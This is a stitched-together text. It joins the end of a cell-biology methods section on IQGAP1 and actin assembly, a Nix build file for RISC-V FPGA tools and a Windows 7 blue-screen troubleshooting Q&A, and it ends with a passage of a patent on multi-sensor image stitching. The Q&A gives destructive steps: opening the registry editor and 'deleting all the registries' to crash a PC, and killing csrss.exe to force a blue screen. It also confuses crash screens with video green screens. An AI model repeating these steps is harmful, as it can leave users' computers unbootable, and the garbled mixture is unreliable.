ρ-formaldehyde in PBS (10 minutes) followed by 0.2% Triton X-100 (2 minutes). After fixation and permeabilization, cells were washed thoroughly and incubated successively with primary and secondary antibodies for 1 hour each, with several washes after each antibody step. F-actin was detected in ρ-formaldehyde-fixed, Triton X-100-permeabilized cells with Alexa Fluor 568-phalloidin (Molecular Probes). Fluorescence confocal micrographs were taken using a CARV spinning disk confocal head (Atto Instruments) mounted on the Zeiss microscope system described earlier. Immunoprecipitation Sub-confluent MDBK cells were serum starved for 12-18 hours, before being stimulated with 50 ng/ml FGF2. Cells harvested just prior to FGF2 addition and at various times thereafter were lysed in buffer A (50 mM Hepes pH 7.4, 50 mM NaCl, 0.5% sodium deoxycholate, 1 mM EDTA, 1% Triton X-100, 2 mM NaVO4, 20 mM NaF, 1 mM PMSF, and 2 μg/ml each of chymostatin, leupeptin and pepstatin A), and the lysates were then clarified by centrifugation. Monoclonal anti-IQGAP1, or monoclonal tau-1 as an irrelevant control, was then added to the clarified lysates, which were subsequently incubated for 4 hours at 4°C. Next, EZview red protein-G affinity gel beads (Sigma) were added to samples, which were incubated for an additional 2 hours at 4°C. Immuno-complexes were collected by brief centrifugation, washed in buffer B (50 mM Tris pH 7.4, 150 mM NaCl, 0.5% Triton X-100, 1 mM PMSF), and analyzed by immunoblotting using polyclonal antibodies to IQGAP1, N-WASP, Arp3 and FGFR1, and SuperSignal chemiluminescent reagents (Pierce). Affinity pull-down assay Coding DNA for the FGFR1 cytoplasmic domain was amplified by PCR from mouse brain cDNA using the following primers: forward, 5′-gtcatcatctataagatgaagagcggc-3′; reverse, 5′-ctcaggtaacggctcatgagagaagac-3′. EcoRI and NotI cloning sites were added by PCR using these primers: forward, 5′-gcgggaattcgtcatcatctaaga-3′; reverse, 5′-gaagcggccgcctcaggtaacgg-3′. GST-FGFR1 tail and unmodified GST were expressed in transformed E. coli (strain BL21), and purified from bacterial lysates using glutathione-Sepharose 4B beads (Pharmacia). Glutathione-Sepaharose 4B beads containing ∼2 μM GST-FGFR1 tail or GST were then mixed with 1 μM IQGAP1FL; Ni-NTA-agarose (nickel) affinity beads (Qiagen) containing ∼1 μM his-tagged IQGAP1FL, IQGAP1ΔNT, IQGAP12-522, IQGAP12-210, IQGAP12-71, or tau were mixed with 500 nM N-WASP. After a 1-hour incubation, beads were collected by centrifugation and washed, and bound proteins were analyzed by chemiluminescent immunoblotting. Pyrene-actin assembly assay Previously published methods were used to purify rabbit muscle actin (Bashour et al., 1997), and recombinant, his-tagged IQGAP1FL, IQGAP1ΔNT, IQGAP12-522, IQGAP12-210 and IQGAP12-71 (Mateer et al., 2004). IQGAP1ΔNT is a newly described deletion mutant derived from a pBlueScript II SK(+) plasmid containing the full-length human cDNA for IQGAP1 (pBSIQG1-MH) by the same methods used to create the other IQGAP1 deletion mutants used in this study. IQGAP1ΔNT lacks only the first 156 amino acids of full-length IQGAP1, and was purified from baculovirus-infected Sf9 insect cells. Published methods were also used for purifying GST-VCA from bacteria (Egile et al., 1999), the Arp2/3 complex from bovine calf thymus (Higgs et al., 1999) and rat N-WASP from baculovirus-infected Sf9 cells (Miki et al., 1998), and for covalently coupling pyrene to purified actin (Bryan and Coluccio, 1985). Pyrene-actin assembly assays were performed in polymerization buffer (2 mM Tris, and 20 mM imidazole pH 7.5, 100 mM KCl, 2 mM MgCl2, 1 mM EGTA, 0.1 mM EDTA, 1 mM DTT, 0.2 mM ATP and 0.2 mM PMSF) using 365 nm excitation and 386 nm emission in a Photon Technology Incorporated model QM-4/5000 spetrofluorometer. In each assay, 5% of the total actin was pyrene-labeled. Prior to performing actin assembly assays by spectrofluorometry or TIRF microscopy, proteins were dialyzed overnight at 4°C in the following buffers: actin (2 mM Tris pH 8.0, 0.2 mM ATP, 0.1 mM DTT, 0.2 mM CaCl2); the Arp2/3 complex (20 mM Tris pH 7.5, 50 mM KCl, 0.2 mM EGTA, 0.2 mM MgCl2, 0.1 mM ATP, 0.5 mM DTT); all forms of IQGAP1 (50 mM Tris pH 7.5, 20 mM imidazole, 200 mM KCl, 1 mM EGTA, 0.1 mM ATP, 1 mM DTT, 0.1 mM PMSF); N-WASP (20 mM Tris pH 7.5, 10 mM EDTA, 0.1 mM PMSF). Following dialysis, insoluble protein was removed from each sample by centrifugation for 30 minutes at 4°C at 213,483 g (max.) in a Beckman TLA 120.1 rotor using a Beckman Optima TLX Ultracentrifuge. Next, the actin was mixed with EGTA to 1 mM and MgCl2 to 0.1 mM, and then incubated for 2 minutes at room temperature. During this 2 minute period, the remaining proteins were mixed together, and the cocktail was adjusted with concentrated stock solutions of buffers, salts, ATP and PMSF to yield a final solution composition at pH 7.5 of 20 mM Tris, 20 mM imidazole, 100 mM KCl, 2 mM MgCl2, 1 mM EGTA, 1 mM DTT, 0.2 mM ATP and 0.2 mM PMSF. TIRF microscopy Methods for preparing Oregon Green-labeled actin, and TIRF microscopy have been described previously (Kuhn and Pollard, 2005). Images were captured at 5-second intervals on an Olympus IX 71 inverted microscope using a 60×/1.45 NA Olympus objective, a Melles Griot 25 mW argon laser, a Roper CoolSNAP cooled CCD, and Scanalytics IP Lab software. Samples were prepared exactly as for pyrene-actin assembly assays, except that Oregon green-actin was used at 20% of total actin in place of 5% pyrene-actin. Sample chambers were coated with 6.25-25 nM N-ethylmaleimide-modified (Veigel et al., 1998) rabbit skeletal muscle myosin II (Sigma) prior to loading actin assembly cocktails into the chambers. TIRF experiments were typically terminated after 10 minutes, when substrate-bound actin filaments became so dense that it was no longer possible to resolve individual filaments. Acknowledgments This work was supported by NIH grants NS30485 and NS051746, and a University of Virginia Digestive Diseases Research Center Pilot/Feasibility Award through NIH P30 grant DK067629 to G.S.B.; and NIH grant GM067222 to D.A.S. The authors thank Scott Mateer and Leah Morris for their contributions to this project during its initial stages, Jean-Marie Sontag for designing the IQGAP1 fragments, Megan Bloom for assistance with the statistical analysis, and Ammasi (Peri) Periasamy for help with TIRF microscopy. We also thank Ruth Kroschewsky (ETH Zurich) and Marie-France Carlier (CNRS, Gifsur-Yvette) for sharing data about their parallel study (Le Clainche et al., 2007) prior to publication. Footnotes • Accepted December 8, 2006. References View Abstract  
__label__pos
0.562892
{ pkgs }: rec { drvs = rec { yosys = pkgs.callPackage ./eda/yosys.nix {}; symbiyosys = pkgs.symbiyosys.override { inherit yosys; }; nmigen = pkgs.callPackage ./eda/nmigen.nix { inherit yosys; }; scala-spinalhdl = pkgs.callPackage ./eda/scala-spinalhdl.nix {}; jtagtap = pkgs.callPackage ./cores/jtagtap.nix { inherit nmigen; }; minerva = pkgs.callPackage ./cores/minerva.nix { inherit nmigen; inherit jtagtap; }; vexriscv-small = pkgs.callPackage ./cores/vexriscv.nix { inherit scala-spinalhdl; name = "vexriscv-small"; scalaToRun = "vexriscv.demo.GenSmallAndProductive"; }; heavycomps = pkgs.callPackage ./heavycomps.nix { inherit nmigen; }; binutils-riscv = pkgs.callPackage ./compilers/binutils.nix { platform = "riscv32"; }; rust-riscv32imc-crates = pkgs.callPackage ./compilers/rust-riscv32imc-crates.nix { }; fw-helloworld = pkgs.callPackage ./firmware { inherit rust-riscv32imc-crates binutils-riscv; }; }; lib = { symbiflow = import ./eda/symbiflow.nix { inherit pkgs; inherit (drvs) yosys; }; vivado = import ./eda/vivado.nix { inherit pkgs; }; }; }
__label__pos
0.991952
How To Fix Blue Screen Windows 7 Memory Dump? Check for hard disk issues: • Click Start. • Go to Computer. • Right-click on the main drive, where Windows 7 is installed on, and click Properties. • Click the Tools tab and at the Error-checking section click Check now. • Select both Automatically fix file system errors and Scan for and attempt recovery of bad sectors. • Click Start. How do I fix a blue dump error? Using Safe mode to fix stop error 1. Click the Advanced Startup option. 2. Click the Troubleshoot option. 3. Click on Advanced options. 4. Click the Startup Settings option. 5. Click the Restart button. 6. After your computer reboots, press F4 (or 4) to select the Enable Safe Mode option. What is the cause of blue screen in Windows 7? If a driver you’ve installed is causing Windows to blue screen, it shouldn’t do so in safe mode. Check for Hardware Problems: Blue screens can be caused by faulty hardware in your computer. Try testing your computer’s memory for errors and checking its temperature to ensure that it isn’t overheating. What causes a memory dump in Windows 7? When a Windows 7 crash occurs, solutions providers should check the crash dump, also called “minidump,” files that Windows creates for debugging, located at %SystemRoot%MEMORY.DMP. This file usually points to the cause of any BSOD or black-screen issues, such as video adapter problems or application bugs. What is dumping physical memory to disk? A memory dump is a process in which the contents of memory are displayed and stored in case of an application or system crash. These are the possible reasons for Physical Memory Dump error: corrupted system files, damaged hard disk, corrupted RAM, compatibility of hardware and software. Can the Blue Screen of Death Be Fixed? BSoDs can be caused by poorly written device drivers or malfunctioning hardware, such as faulty memory, power supply issues, overheating of components, or hardware running beyond its specification limits. In the Windows 9x era, incompatible DLLs or bugs in the operating system kernel could also cause BSoDs. Is blue screen of death bad? zyrrahXD asked the Windows forum if a Blue Screen of Death can severely damage a PC. A BSoD can be a symptom of a hardware problem. In that case, it might look as if the error itself caused the problem. Although a BSoD won’t damage your hardware, it can ruin your day. How do I get rid of the blue screen on Windows 7? If you have Startup Repair preinstalled on the system: • Remove any CDs, DVDs or USBs from the system. • Restart your computer. • Press and hold F8 as your computer boots, but before the Windows 7 logo appears. • At the Advanced Boot Options screen, select Repair your computer using the arrow keys and hit Enter. How do I disable BIOS memory in Windows 7? Part 2 Disabling Memory Options 1. Go to the “Advanced” page. Select Advanced at the top of the screen by pressing the → arrow key, then press ↵ Enter . 2. Look for the memory option you want to disable. 3. Select a memory item you want to disabled. 4. Press the “Change” key. 5. Press the Esc key. 6. Press ↵ Enter when prompted. How can I get the blue screen of death? To make a harmless and real blue screen of death (BSOD), right click the taskbar, click start task manager, click process tabs, click show processes from all users, right click csrss.exe and click end process. Check abandon unsaved data and shutdown, then click shutdown. Restart your pc and it’s normal again. How do I open a crash dump file in Windows 7? Opening Memory Dump Files • Open the Start menu. • type windbg.exe . • Click File and select Open Crash Dump. • Browse to the .dmp file you wish to analyze. • Click Open. How do I fix Windows 7 from hanging? Step 1: Log into Windows 7 with Administrator rights, click on the Start button and type in MSCONFIG in the search box. Step 2: Click on the General tab and and choose Selective Startup. Make sure to uncheck the box that says “Load Startup Items“. How do I dump memory in Windows 7? On your desktop: 1. Click Start, right-click Computer and select Properties. 2. Click Advanced system settings. 3. Click Advanced tab. 4. Under the Writing debugging information section, click Settings. 5. Select the Complete memory dump. What is memory dumping blue screen? How to Fix a Blue Screen Memory Dump. A blue screen memory dump is an error screen that comes up just before the system gets rebooted, because the operating system is no longer able to function properly due to a variety of reasons, and the content of the RAM is dumped on to a data file. What does memory dump mean? A memory dump is a process in which the contents of memory are displayed and stored in case of an application or system crash. Memory dump helps software developers and system administrators to diagnose, identify and resolve the problem that led to application or system failure. What’s a crash dump? A crash dump is classified as an unexpected error simply because it can happen anytime. This type of malfunction can happen when a few portions of the processors data or RAM memory are erroneously copied to one or more files. A Crash Dump usually points to some serious and critical errors with your Computer. How do I force a blue screen? Use the Right Control + Scroll Lock + Scroll Lock key combination. The only thing left for you to do in order to trigger a nice Blue Screen Of Death is to hold down the Right Control key on your keyboard and then press the Scroll Lock key twice, in quick succession. How do you analyze a blue screen? How to Analyze a BSOD Crash Dump • Blue screens of death can be caused by a multitude of factors. • Step 2: Run the Setup for the SDK. • Step 3: Wait for the Installer. • Step 4: Run WinDbg. • Step 5: Set the Symbol Path. • Step 6: Input the Symbols File Path. • Step 7: Save the Workspace. • Step 8: Open the Crash Dump. What causes memory management blue screen? Damaged or removed system files after you’ve installed software or drivers related to Windows Operating System. Error 0x1A blue screen caused by a damaged hard disk. MEMORY_MANAGEMENT STOP error due to memory (RAM) corruption. Is Blue Screen of Death fixable? A Blue Screen of Death (BSOD), also called a STOP Error, will appear when an issue is so serious that Windows must stop completely. A Blue Screen of Death is usually hardware or driver related. Most BSODs show a STOP code that can be used to help figure out the root cause of the Blue Screen of Death. Does Blue Screen of Death delete files? If you have a blue screen of death error on your PC, relax! 4 effective solutions are available here to help you fix BSOD issue on Windows without losing any files. Your computer cannot be boot and present you with a blue screen of death after the system update. Why use blue screen instead of green? Using green instead of blue results in less noise when keying out the footage. Color spill. Depending on your shoot, color spill can be better or worse depending on the color of your screen. Blue screen tends to have less spill than green, and also happens to be easier to color correct than green. How do I change blue screen? Use a green-screen or blue-screen effect 1. In the timeline, select a clip or range that you shot against a green or blue backdrop, and drag it above a clip in your project. 2. If the video overlay controls aren’t shown, click the Video Overlay Settings button. 3. Click the pop-up menu on the left and choose Green/Blue Screen. How do I crash my computer windows 7? Method 1 • Step 1: Go To Start Menu. • Step 2: Click On Run. • Step 3: Type ” Regedit ” in the run dialog box. • Step 4: Click OK. • Step 5: Under the ” My computer ” option you will find the following folders: • Step 6: Open all the above-mentioned folders. • Step 7: Click on ” Delete all the registries “. How do you get a blue screen on Windows? How to force a Blue Screen of Death error 1. Use the Windows key + R keyboard shortcut to open the Run command. 2. Type regedit, and click OK to open the registry. 3. Browse the following path: 4. Right-click on the right side, select New, and then click on DWORD (32-bit) Value. 5. Name the new DWORD CrashOnCtrlScroll and press Enter. Can I delete crash dump file? Because of their large size, memory dump files can take up a lot of hard drive space. You can delete memory dumps to free up space on your hard disk. This task can be accomplished by using the Data Cleanup Utility. What are system error memory dump files windows 7? Windows saves all these memory dumps in form of System Error Memory Dump files in your local disk C. The disk cleanup utility can be used to delete these files and make the storage usable. However, many users reported that the disk cleanup utility failed to delete the required files. Where is the memory dump file in Windows 7? The default location of the dump file is %SystemRoot%memory.dmp i.e C:\Windows\memory.dmp if C: is the system drive. Windows can also capture small memory dumps which occupy less space. These dumps are created at %SystemRoot%Minidump.dmp (C:\Window\Minidump.dump if C: is the system drive). Photo in the article by “Wikimedia Commons” https://commons.wikimedia.org/wiki/File:Blue_screen_in_ko.jpg Like this post? Please share to your friends: OS Today
__label__pos
0.999705
diazepam anxiety meds What is Valium? Valium (diazepam) is a benzodiazepine. It is felt that diazepam works by upgrading the movement of specific neurotransmitters in the brain. Valium is utilized to treat uneasiness problems, or liquor withdrawal manifestations. Valium is some of the time utilized with different medications to treat muscle spasms and firmness, or seizures. Precautions: You ought not utilize Valium on the off chance that you are hypersensitive to diazepam or comparative drugs (Ativan, Klonopin, Xanax, and others), or then again assuming you have myasthenia gravis, extreme liver infection, tight point glaucoma, a serious breathing issue, or rest apnea. Diazepam can slow or stop your breathing, particularly assuming you have as of late utilized a narcotic medication or liquor. Keep the medicine away from others or kids. Try not to quit utilizing this medication without asking your doctor. You might have hazardous withdrawal indications assuming you quit utilizing the medication out of nowhere after long haul use. A few withdrawal side effects might endure as long as a year or longer. Move clinical assistance immediately in the event that you quit utilizing Valium and have manifestations, for example, uncommon muscle developments, being more dynamic or garrulous, abrupt and serious changes in temperament or conduct, disarray, visualizations, seizures, or contemplations about self destruction. Things to know before you take this. Certain individuals have considerations about self destruction while taking Valium. Remain caution to changes in your temperament or side effects. Your family or guardians ought to likewise look for unexpected changes in your behaviour due to medication. May hurt an unborn child. Try not to utilize assuming you are pregnant or may become pregnant. On the off chance that you use Valium during pregnancy, your child could be brought into the world with hazardous withdrawal manifestations, and may require clinical treatment for quite a long time. Try not to begin or stop seizure medication during pregnancy without your doctor’s recommendation. Diazepam might hurt an unborn child, yet having a seizure during pregnancy could hurt both mother and child. Forestalling seizures might offset these dangers. Tell your doctor immediately assuming that you become pregnant. There might be other seizure medications that are more secure to use during pregnancy. You ought not breastfeed. How could I take Valium? Take Valium precisely as recommended by your doctor. Follow the bearings on your prescription name and read all medication guides or guidance sheets. Never use Valium in bigger sums, or for longer than endorsed. Let your doctor know if you feel an expanded inclination to utilize a greater amount of this medication. Never share this medication with another person, especially someone with a foundation set apart by persistent medication use. Keep the medication where others can’t get to it. Selling or offering this medication is illegal. Measure fluid medication with the provided estimating gadget (not a kitchen spoon). Valium ought to be utilized for just a brief time frame. Try not to take this medication for longer than 4 months without your doctor’s recommendation. Try not to quit utilizing Valium without asking your doctor. You might have expanded seizures or dangerous withdrawal indications on the off chance that you quit utilizing the medication abruptly after long haul use. What would it be advisable for me to keep away from while taking Valium? Try not to drink liquor. Perilous incidental effects or passing could happen. Grapefruit might communicate with diazepam and lead to undesirable incidental effects. Stay away from items made of grape fruits. Abstain from driving or dangerous action until you realize what this medication will mean for you.
__label__pos
0.730368
Object Oriented Programming: Curiosity of access modifiers ❝Access modifiers that are typically available to programming languages.❞ Contents In object oriented programming languages there are a number of different access levels available. These access levels can be applied to fields and methods. Access levels are there to ensure the features of an object are called only by those parts of the logic that are allowed to access them. They enforce encapsulation, separation of implementation logic. In a class hierarchy-based OOP language there are typically 4 levels of access modifiers: Access modifiers in practice Now if we look at this from the perspective of implementation and usage logic, we find that there is something curious going on. private, package-private and public all define an access level that is relevant to the usage of such an object: private features are restricted from being used by anything but implementation logic, package-private features can be used only if the logic resides within the same package, and public can be used by any (usage) logic. Similarly, there is a scale that can be explained for implementation logic. private can be accessed only by features within the same class, protected can be accessed only by features within the same class hierarchy (i.e. derived from this class, thus extending on its internal state) and implementation logic, and public features are open to all, including any implementation. A schematic representation of the access levels: <<usage>> public | | <<usage>> protected <<implementation>> / \ / \ <<usage>> pkg-private ??? <<implementation>> \ / \ / private <<implementation>> Note that if you make a feature accessible to the (derived) class hierarchy, i.e. other classes that derive from this class, that you are also making it accessible to usage logic within the package. This seems like a curious choice, since implementation logic exists for a different reason than usage logic. The level denoted by ??? is a blind spot. There exists no access modifier that sets the access level to that particular spot in the graph. Effectively, this means that if you open up your implementation methods to classes that derive from your class, then you are implicitly opening up your otherwise hidden (encapsulated) implementation logic (remember, this is internal state management) to usage logic within the package. One can argue that this is not a big issue, as we implement the package ourselves. However, my point is that you unnecessarily expose implementation logic to outside influences, making it available to be called by usage logic, even though it may be intended for implementation logic only. And, as we know, usage logic is not responsible for or interested in preserving internal state consistency. I can only speak for myself, of course, but I have had more cases where the missing access level would be appropriate than I have had cases where the current protected level is appropriate. That is, where I have written a method that was required to be accessible for both implementation logic in derived classes and usage logic within the same package. The right way to use ‘protected We discussed how Java’s protected access modifier is not as useful as expected. Now we’ve seen earlier that there are different concerns when accessing for the purpose of using a method from accessing for inheriting from an object and extending the object with new implementation logic. Considering these distinct goals, only one of these two goals should be targeted when a method is implemented. Given the above caveat, it would be best to use access modifier package-private to grant package-level usage access (this is actually in line with intentions) and to grant inheritance-level implementation (privileged) access with access modifier protected. The latter, protected, grants wider access than described here, but for the purpose of control and manageability we should refrain from leveraging protected access level for usage logic. C#’s access modifiers It turns out that C# defined the access modifiers differently, making them more suitable for the goals as described above. See Accessibility Levels (C# Reference). There, protected really does mean that only access from derived classes is allowed. It correctly separates the usage from the implementation levels. Quote from the ‘protected’ access level description: protected Access is limited to the containing class or types derived from the containing class. Access modifiers in Go To give you an impression of how you could otherwise arrange access levels in programming languages, we’ll look at the access levels in Go. Go has a very limited set of access modifiers … actually it does not have any access modifiers. But it does have access levels. There are 2 variations: unexported and exported. The unexported level exists to limit accessibility to logic in the same package. Exported access does not impose this limit and makes these features freely accessible from the outside. Go manages these access levels through the use of capitalization of the start of a method name. If the first letter is a capital, then a feature is exported. If it is not a capital, then it is limited to use inside the package. Note that there is no further access level for making a feature private to only a single type, such that even other logic inside the package cannot access it. In Go, inside a package you can access everything. Within the same package, there is no real way to prevent logic that only uses an object from accessing certain features. There is, however, the option to use an interface definition to restrict the amount of methods that are exposed. As the specific type is not known, only the methods of the interface are provided. As a side note Technically one could argue that public is a valid implementation access level too. This would qualify if you consider global state, such as static variables spread over multiple classes, as state that should be managed. Since global state is not exactly best practice in object oriented programming, I do not take that into account here. This post is part of the Object Oriented Programming series. Other posts in this series:
__label__pos
0.765412
    Resources Contact Us Home Browse by: INVENTOR PATENT HOLDER PATENT NUMBER DATE     Image processing apparatus 6744931 Image processing apparatus Patent Drawings:Drawing: 6744931-10    Drawing: 6744931-11    Drawing: 6744931-12    Drawing: 6744931-13    Drawing: 6744931-14    Drawing: 6744931-15    Drawing: 6744931-16    Drawing: 6744931-17    Drawing: 6744931-18    Drawing: 6744931-19     « 1 2 3 4 5 6 7 » (86 images) Inventor: Komiya, et al. Date Issued: June 1, 2004 Application: 09/740,492 Filed: December 19, 2000 Inventors: Ebihara; Toshiyuki (Hino, JP) Iba; Yoichi (Hachioji, JP) Komiya; Yasuhiro (Hino, JP) Mori; Takeshi (Machida, JP) Nagasaki; Tatsuo (Yokohama, JP) Oura; Koutatsu (Chofu, JP) Sawaki; Ryoichi (Hachioji, JP) Tomabechi; Hideo (Higashiyamato, JP) Assignee: Olympus Optical Co., Ltd. (Tokyo, JP) Primary Examiner: Chang; Jon Assistant Examiner: Attorney Or Agent: Frishauf, Holtz, Goodman & Chick, P.C. U.S. Class: 345/629; 382/284; 382/294 Field Of Search: 382/284; 382/294; 345/629; 345/630; 348/36; 348/37; 352/69; 352/70; 352/71; 396/20 International Class: U.S Patent Documents: 3905045; 4220967; 4754492; 4876732; 4951136; 4992781; 4994914; 5022085; 5054100; 5140647; 5187754; 5274453; 5315390; 5321798; 5469274; 5566251; 5686960 Foreign Patent Documents: 57-131188; 62-195984; 62-247692; 64-34073; 01-251962; 2-178646; 3-108962; 4-269793; 4-347979; 5-30520; 5-328205; 6-178327 Other References: Parallel Distributed Processing, David E. Rumelhart et al., vol. 1, pp. 319-362, Chapter 8; The MIT Press, Cambridge, Massachusetts,1986.. Abstract: Disclosed herein is an image processing apparatus, in which an object image focused by a lens is split into a plurality of images by means of a light splitting section. These images are converted into image data items by a plurality of imaging devices which are arranged with their imaging area overlapping in part. The image data items are stored temporarily in an image storing section. A displacement detecting section detects displacement coefficients (rotation angle R and parallel displacement S) from the image signals representing the mutual overlap region of two images which are to be combined and which are represented by two image data items read from the image storing section. The position of any specified pixel of the image displayed is identified by the pixel signal generated by the corresponding pixel of any imaging device. An interpolation section performs interpolation on the pixel values of the imaging device, thereby correcting the values of the other pixels of the image displayed and ultimately generating interpolated image signals. The interpolated image signals are combined with the image signals produced by the imaging device, whereby a display section displays a high-resolution image. Claim: What is claimed is: 1. An image processing apparatus for combining a plurality of image areas which are obtained as image data by dividing an object image, comprising: imaging means for imagingan object within each of a plurality of image areas having at least one overlap area; and image area position detecting means for detecting a positional relationship relating to overlapping between the plurality of image areas within which the object isimaged by said imaging means by calculating correlation between the plurality of image areas: wherein said imaging means includes: optical image picking-up means for picking up an image of the object; light splitting means for splitting an object lightreceived by said optical image picking-up means into a plurality of object lights; a plurality of groups of imaging elements for obtaining images from the plurality of object lights obtained by said light splitting means, and said image area positiondetecting means includes: displacement determining means for setting a reference area in the image obtained by one of the groups of imaging elements of said imaging means, setting a search area in a position corresponding to the reference area in theimage obtained by another one of the groups of imaging elements, and then calculating a displacement between said one of the groups of imaging elements and said another one of the groups of imaging elements by performing a correlation arithmetic withrespect to the reference area and the search area, to thereby determine a coefficient for use in interpolation; storing means for storing the coefficient determined by said displacement determining means; interpolation means for calculating an imagesignal associated with a position of said another one of the groups of imaging elements which corresponds to a position of said one of the groups of imaging elements, by using an interpolation arithmetic, in accordance with a value indicated by datastored in said storing means; and image data synthesizing means for combining a plurality of image data output from said imaging means and said interpolation means. 2. The image processing apparatus according to claim 1, which further comprises (i) first image storing means for storing an object obtained as image data by said imaging means, and (ii) second image storing means for storing a reference imageas reference image data in advance, and wherein the image area position detecting means comprises (i) movement vector detecting means for calculating a correlation between the images read out as image data from said first and second storing means, andcomparing the images, to thereby detect a movement vector, and (ii) third image storing means for storing the image as the image data which is moved from said first image storing means based on the movement vector detected by said movement vectordetecting means. 3. The image processing apparatus according to claim 2, wherein the movement detecting means includes a correlation area selecting means for selecting an area having a high correlation. 4. The image processing apparatus according to claim 1, which further comprises a mirror rotatably provided between the object and said imaging means, and wherein when said imaging means images the object, object images are intermittentlyobtained as image data, and said mirror is rotated to shift an imaging range over the object, while obtaining the object images. 5. An image processing apparatus for combining a plurality of image areas which are obtained as image data by dividing an object image, comprising: imaging means for imaging an object within each of a plurality of image areas having at least oneoverlap area; image area position detecting means for detecting a positional relationship relating to overlapping between the plurality of image areas within which the object is imaged by said imaging means by calculating correlation between theplurality of image areas; a finder for displaying in real time an image being obtained by said imaging means, along with that overlap area of an image previously obtained by said imaging means, which is to be made to overlap with the image beingobtained by said imaging means when the image being obtained by said imaging means is connected to the image previously obtained by said imaging means, correlation arithmetic means for performing a correlation arithmetic with respect to an image signalassociated with the overlap area of the previously obtained image and a present image signal representing a present image obtained subsequent to the previously obtained image to thereby determine a displacement between the previously obtained image andthe present image, and indicating means for indicating a direction in which said imaging means is to be moved to obtain an image signal that coincides with the image signal associated with the overlap area of the previously obtained image based on thedisplacement determined by said correlation arithmetic means. 6. The image processing apparatus according to claim 5, wherein said indicating means displays an arrow indicator in the finder to indicate the direction in which the imaging means is to be moved. 7. The image processing apparatus according to claim 5, wherein said indicating means changes color of the arrow indicator displayed in the finder when the present image signal representing the present image obtained subsequent to the previouslyobtained image coincides with the image signal associated with the overlap area of the previously obtained image. Description: BACKGROUND OF THE INVENTION 1. Field of the Invention The present invention relates to an image processing apparatus for forming either images of the parts of an object or images of an object which are identical but different in color, and for combining the images into a wide high-resolution imageof the object. 2. Description of the Related Art Image processing apparatuses using a solid-state imaging device such as a CCD are generally used in electronic still cameras, video cameras, and the like. It is demanded that an image processing apparatus have a higher resolution, particularlyso high a resolution that the apparatus may provide a wide image of an object. Also it is desired that the image processing apparatus have so high a resolution that it can form an image as wide as a panoramic image. Two techniques are available for increasing the resolution of the image processing apparatus. The first technique is to use a solid-state imaging device with a sufficiently high resolution. The second technique is to use a plurality ofsolid-state imaging devices for obtaining images of parts of an object, respectively, and to combine the images into a single high-resolution image of the entire object. More precisely, the first resolution-increasing technique is to use more pixels per unit area of the device chip. In other words, smaller pixels are arranged in a greater number in the unit area, thus increasing the pixel density of the imagingdevice. The second resolution-increasing technique is classified into two types. The first-type technique comprises the first step of controlling the optical system incorporated in an image processing apparatus, thereby switching the view field of theapparatus from one part of an object to another part and thus enabling the imaging devices to produce images of parts of an object, and the second step of combining the images, thus produced, into a high-resolution image of the entire object. Thesecond-type technique comprises the first step of dividing an optical image 600 of an object into, for example, four parts by means of prisms as shown in FIG. 1, the second step of applying the parts of the optical image to four imaging devices 611, 621,631, and 641, respectively, and the third step of combining the image data items output by the devices, thereby forming a single image of the object. In the second-type technique, the imaging devices 611 to 641 are so positioned as to cover thepredetermined parts of the object as illustrated in FIG. 2. There is known another resolution-increasing technique similar to the second-type technique described in the preceding paragraph. This technique uses a detector 611 having four imaging devices 612 which are arranged in the same plane in a2.times.2 matrix, spaced apart from one another for a predetermined distance as is shown in FIGS. 3A to 3C. The view-field image 613 of an object (i.e., a broken-line square) is intermittently moved with respect to the imaging-device matrix by drivingan optical system, in the sequence indicated by FIGS. 3A, 3B, 3C, and 3D. The optical image of an object need not be divided by prisms or similar means, unlike in the second-type technique. The conventional resolution-increasing techniques, described above, are disadvantageous in the following respects. The first technique can increase the resolution but to a limited degree, for two reasons. First, the number of pixels the existing manufacturing technology can form in the unit area of the device chip is limited. Second, the smaller a pixel,the less sensitive it is. A larger device chip may indeed be used to form more pixels on the chip. With the conventional manufacturing method, however, the ratio of defective pixels to good ones will increase if many pixels are formed on a large chip. Consequently, solid-state imaging devices having a large image-receiving surface can hardly be manufactured with a sufficiently high yield. In the second resolution-increasing technique, the image data items output from the imaging devices (e.g., four devices) are combined to produce a single image. To render the reproduced image substantially identical to the original image of theobject, the images of the object parts should neither be spaced apart nor overlap one another. The images will be spaced apart or overlap unless the pixels arranged along that edge of one device which abut on the edge of the next device are spaced byexactly the one-pixel distance from the pixels arranged along that edge of the next device. The imaging devices therefore need to be positioned with very high precision during the manufacture of the image processing apparatus. It takes much time toposition the devices so precisely, inevitably reducing the manufacture efficiency and, ultimately, raising the cost of the image processing apparatus. Also in the resolution-increasing technique similar to the second-type technique, the imaging devices must be positioned with high precision. In addition, the optical system must be driven with high precision in order to intermittently move theview-field image of an object (i.e., a broken-line square) with respect to the imaging-device matrix. A high-precision drive is indispensable to the image processing apparatus. The use of the drive not only makes it difficult to miniaturize or lightenthe apparatus, but also raises the manufacturing cost of the apparatus. A color image processing apparatus is known, a typical example of which is a so-called "three-section color camera." This color camera comprises a color-component generating system and three imaging devices. The color-component generating systemdecomposes an input optical image of an object into a red image, a green image, and a blue image. The three imaging devices convert the red image, the green image, and the blue image into red signals, green signals, and blue signals--all beingtelevision signals of NTSC system or the like. The signals output from the three imaging devices are combined, whereby the red, green and blue images are combined, forming a single color image of the object. A color image with no color distortioncannot be formed unless the imaging devices are positioned or registered with high precision. Images of parts of an object are combined, also in an image processing apparatus which has a plurality of optical imaging devices for photographing the parts of the object on photographic film, thereby forming a panoramic image of the object. Toform a high-quality panoramic image, the images of the object parts should neither be spaced apart nor overlapping one another. Hence, the optical system incorporated in this image processing apparatus must be controlled with high precision. Consequently, the apparatus requires a complex device for controlling the optical system, and cannot be manufactured at low cost. SUMMARY OF THE INVENTION Accordingly it is the object of this invention is to provide an image processing apparatus in which either images of the parts of an object or images of an object which are identical but different in color, and for combining the images into awide high-resolution image of the object. In a first aspect of the invention, there is provided an image processing apparatus for combining a plurality of images into a single large image such that the images have overlap regions, comprising: image storing means for storing image dataitems representing the images; interpolation means for detecting a positional relation between a reference pixel and a given pixel in the overlap area of each image from image data read from the image storing means and representing the overlap area, andfor interpolating the image data item read from the image storing means and representing the image, in accordance with a displacement coefficient indicating the positional relation, thereby to generate interpolated image data; and image-synthesizingmeans for combining the interpolated image data items generated by the interpolation means, thereby to form a single large image. In a second aspect of the invention, there is provided an image processing apparatus for combining a plurality of images into a single large image such that the images have overlap regions, comprising: light splitting means for splitting anobject image; a plurality of imaging devices arranged such that an imaging area of each overlaps that of another; image storing means for storing image data items generated by the imaging devices and representing images overlapping one another andoverlap 